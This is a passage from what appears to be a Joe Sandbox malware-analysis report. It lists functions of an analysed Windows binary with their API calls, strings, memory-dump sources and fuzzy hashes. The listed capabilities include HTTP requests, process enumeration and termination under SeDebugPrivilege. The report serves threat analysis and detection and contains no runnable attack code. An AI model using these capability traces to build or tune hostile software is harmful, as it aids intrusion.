                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1464919966-438819550
                                                                                                                                                                            • Opcode ID: 3cffce01cad43db7ff23b9852e4bf4c5d0e26beb128455bc87c3a522a5f08dee
                                                                                                                                                                            • Instruction ID: 2c5caacacdf1cff4c06885dd38e1f1bbf37a4b7504abd895aec309f48adc2ac8
                                                                                                                                                                            • Opcode Fuzzy Hash: 3cffce01cad43db7ff23b9852e4bf4c5d0e26beb128455bc87c3a522a5f08dee
                                                                                                                                                                            • Instruction Fuzzy Hash: 936127B25043459FCB10EF64C845E9EB7E8FF89314F04881EE989D7251DB35EA49CB52
                                                                                                                                                                            Function 008E45A5 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateMenu.USER32 ref: 008E45D8
                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 008E45E7
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008E466F
                                                                                                                                                                            • IsMenu.USER32(?), ref: 008E4683
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 008E468D
                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008E46BA
                                                                                                                                                                            • DrawMenuBar.USER32 ref: 008E46C2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                            • String ID: 0$F
                                                                                                                                                                            • API String ID: 161812096-3044882817
                                                                                                                                                                            • Opcode ID: 3e64794e132a08b371068570d777f9931d165e81b14f8382ef9e2d8c9b1d2fbe
                                                                                                                                                                            • Instruction ID: 86db26581aa69a906149c5f27957fd1f2f6510e25bd019f4db8cde60cf2f9209
                                                                                                                                                                            • Opcode Fuzzy Hash: 3e64794e132a08b371068570d777f9931d165e81b14f8382ef9e2d8c9b1d2fbe
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D416778605349EFEB24DF65D894AAA7BB5FF5A314F140028FA49AB360C731A924CF50
                                                                                                                                                                            Function 008B276F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 008B27F4
                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 008B27FF
                                                                                                                                                                            • GetParent.USER32 ref: 008B281B
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B281E
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 008B2827
                                                                                                                                                                            • GetParent.USER32(?), ref: 008B283B
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B283E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                            • Opcode ID: 60bbf11fbbc16a1ac17aee7597ca7c000b6c84b8030ff7c61295e0db493892e3
                                                                                                                                                                            • Instruction ID: e839a08ee672d512394cd040749a2fa6bcf0117b1f6ef25c83fd6b1f5860c87c
                                                                                                                                                                            • Opcode Fuzzy Hash: 60bbf11fbbc16a1ac17aee7597ca7c000b6c84b8030ff7c61295e0db493892e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0921B074900218BBCF11ABA4DC85AEEBBB8FF15310F104116B961AB2A2DB794808DB60
                                                                                                                                                                            Function 008B2850 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                              • Part of subcall function 008B4536: GetClassNameW.USER32(?,?,000000FF), ref: 008B4559
                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 008B28D3
                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 008B28DE
                                                                                                                                                                            • GetParent.USER32 ref: 008B28FA
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B28FD
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 008B2906
                                                                                                                                                                            • GetParent.USER32(?), ref: 008B291A
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 008B291D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 711023334-1403004172
                                                                                                                                                                            • Opcode ID: 8f3a28b331cdbd4581802c69231266ec34a8a0358fc1f72cbaa59e0e6658f30e
                                                                                                                                                                            • Instruction ID: a641064b0e2543ca953764eb03b431bde7d4ce97c714580aec886e4eee1f3faa
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f3a28b331cdbd4581802c69231266ec34a8a0358fc1f72cbaa59e0e6658f30e
                                                                                                                                                                            • Instruction Fuzzy Hash: B421C375E40218BBCF11AFA4DC85EEEBBB8FF14300F004016B951EB2A6DB794849DB60
                                                                                                                                                                            Function 008E4382 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008E43FC
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008E43FF
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008E4426
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008E4449
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008E44C1
                                                                                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 008E450B
                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 008E4526
                                                                                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 008E4541
                                                                                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 008E4555
                                                                                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 008E4572
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                            • Opcode ID: b4c25aca0bf409489519f8f034d01bea45d73389f5d60683f022a91fbd6ce91d
                                                                                                                                                                            • Instruction ID: 4104224e2158993ede632c8fe8f3adb227adff68a58e4cd1196e9e92485cfb73
                                                                                                                                                                            • Opcode Fuzzy Hash: b4c25aca0bf409489519f8f034d01bea45d73389f5d60683f022a91fbd6ce91d
                                                                                                                                                                            • Instruction Fuzzy Hash: B9617B75900248AFDB21DFA8CC81EEE77B8FB4A314F104169FA18E72A1C774AA45DF50
                                                                                                                                                                            Function 008CCBB0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008CCBCF
                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008CCBF7
                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008CCC27
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008CCC7F
                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 008CCC93
                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 008CCC9E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                                                                            • Opcode ID: 687e6c490a4f870f9a01b1e7271d4eb0f4bcf9826500f6b25285d5e1b178449c
                                                                                                                                                                            • Instruction ID: 3cd2c9fec697435a6862d384e5d2287522427761babe5007d9c52ca9f91f0766
                                                                                                                                                                            • Opcode Fuzzy Hash: 687e6c490a4f870f9a01b1e7271d4eb0f4bcf9826500f6b25285d5e1b178449c
                                                                                                                                                                            • Instruction Fuzzy Hash: 98311AB5500708AFD721AF658D88FAB7BFCFB49744B10452EF44ED6200DB35D9099B61
                                                                                                                                                                            Function 008BA12A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00895437,?,?,Bad directive syntax error,008EDCD0,00000000,00000010,?,?), ref: 008BA14B
                                                                                                                                                                            • LoadStringW.USER32(00000000,?,00895437,?), ref: 008BA152
                                                                                                                                                                              • Part of subcall function 0085B25F: _wcslen.LIBCMT ref: 0085B269
                                                                                                                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008BA216
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                            • API String ID: 858772685-4153970271
                                                                                                                                                                            • Opcode ID: 3bf3929ef5ab9c3910253e7c23e80789644655bcc4eae5235477c467ab64c427
                                                                                                                                                                            • Instruction ID: e6b1f931a2537bdc4181e04b87420069339a3ee0cbb63a060e2261988c411429
                                                                                                                                                                            • Opcode Fuzzy Hash: 3bf3929ef5ab9c3910253e7c23e80789644655bcc4eae5235477c467ab64c427
                                                                                                                                                                            • Instruction Fuzzy Hash: F921E13190021EAFCF02AFD4CC06EEEB739FF28305F044415F915AA0A2EA719A1CDB12
                                                                                                                                                                            Function 008B292F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32 ref: 008B293B
                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 008B2950
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008B29DD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameParentSend
                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                            • API String ID: 1290815626-3381328864
                                                                                                                                                                            • Opcode ID: 34617c08b3afe342bee370ec7552028ecaaf2e8c39c8a15447fd93c40c62fd2d
                                                                                                                                                                            • Instruction ID: 7e7d319883b44c6427f44e4770642fef09048ad5578e29499aa81db3db555bc9
                                                                                                                                                                            • Opcode Fuzzy Hash: 34617c08b3afe342bee370ec7552028ecaaf2e8c39c8a15447fd93c40c62fd2d
                                                                                                                                                                            • Instruction Fuzzy Hash: FD11067678C30ABAFA102224EC07CE63FDCFF11768F204116F948E81D6FB65A8955555
                                                                                                                                                                            Function 008CCAA0 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008CCADF
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008CCAF2
                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 008CCB06
                                                                                                                                                                              • Part of subcall function 008CCBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008CCBCF
                                                                                                                                                                              • Part of subcall function 008CCBB0: GetLastError.KERNEL32 ref: 008CCC7F
                                                                                                                                                                              • Part of subcall function 008CCBB0: SetEvent.KERNEL32(?), ref: 008CCC93
                                                                                                                                                                              • Part of subcall function 008CCBB0: InternetCloseHandle.WININET(00000000), ref: 008CCC9E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 337547030-0
                                                                                                                                                                            • Opcode ID: c7eb7108bacd3de72a1eb42cd3fbf3f7528cfe35fabe04169cd9e49c7f4b6ae2
                                                                                                                                                                            • Instruction ID: a2ca7f47ff0234e2d8cbe72427bf7bd69efd93f5c70cd65ce7660bcf2896dd23
                                                                                                                                                                            • Opcode Fuzzy Hash: c7eb7108bacd3de72a1eb42cd3fbf3f7528cfe35fabe04169cd9e49c7f4b6ae2
                                                                                                                                                                            • Instruction Fuzzy Hash: A6318A71600B45AFDB219FA5CD85F76BBF9FF08320B00442DF95ACA610D730E8149BA0
                                                                                                                                                                            Function 008B2093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,008B1CD9,?,?,00000000), ref: 008B209C
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,008B1CD9,?,?,00000000), ref: 008B20A3
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008B1CD9,?,?,00000000), ref: 008B20B8
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,008B1CD9,?,?,00000000), ref: 008B20C0
                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,008B1CD9,?,?,00000000), ref: 008B20C3
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,008B1CD9,?,?,00000000), ref: 008B20D3
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(008B1CD9,00000000,?,008B1CD9,?,?,00000000), ref: 008B20DB
                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,008B1CD9,?,?,00000000), ref: 008B20DE
                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,008B2104,00000000,00000000,00000000), ref: 008B20F8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                            • Opcode ID: 706b89ec5e62fb9de3d1170bcc6e460bd680b4d1e43c5f3588707acac7c07838
                                                                                                                                                                            • Instruction ID: 0fb5fc9314654f51b3241fb00c623be55a1968a031dea923d6e5091e8680d00a
                                                                                                                                                                            • Opcode Fuzzy Hash: 706b89ec5e62fb9de3d1170bcc6e460bd680b4d1e43c5f3588707acac7c07838
                                                                                                                                                                            • Instruction Fuzzy Hash: C901B6B5240348BFE710ABA5DC8EF6B7BACFB89711F004411FA15DF2A1CA74A804CB20
                                                                                                                                                                            Function 008DAA41 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 008BDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 008BDCC1
                                                                                                                                                                              • Part of subcall function 008BDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 008BDCCF
                                                                                                                                                                              • Part of subcall function 008BDC9C: CloseHandle.KERNELBASE(00000000), ref: 008BDD9C
                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008DAACC
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008DAADF
                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 008DAB12
                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 008DABC7
                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 008DABD2
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008DAC23
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                                                            • Opcode ID: d2cd168b90bd613e958bf599c0cce5e76770291d9bb3faf6e90829e942a43fc0
                                                                                                                                                                            • Instruction ID: 2ad856d0f0b883291093aca3681b18b969309ef9b77d977f520ea784beba254f
                                                                                                                                                                            • Opcode Fuzzy Hash: d2cd168b90bd613e958bf599c0cce5e76770291d9bb3faf6e90829e942a43fc0
                                                                                                                                                                            • Instruction Fuzzy Hash: 50616B30204242AFD714DF18C494F1ABBE1FF54318F64859EE4668B7A2C775ED4ACB92
                                                                                                                                                                            Function 008E41E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008E4284
                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 008E4299
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008E42B3
                                                                                                                                                                            • _wcslen.LIBCMT ref: 008E42F8
                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 008E4325
                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 008E4353
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                                                                                            • String ID: SysListView32
                                                                                                                                                                            • API String ID: 2147712094-78025650
                                                                                                                                                                            • Opcode ID: 71b85aafb140f5fee562f27483bf2f1379a565380f592f24880223a5dc6391d8
                                                                                                                                                                            • Instruction ID: bdd67816f328e271c238257026958b69160329529c2972bef9f6f3428c4b6ffb
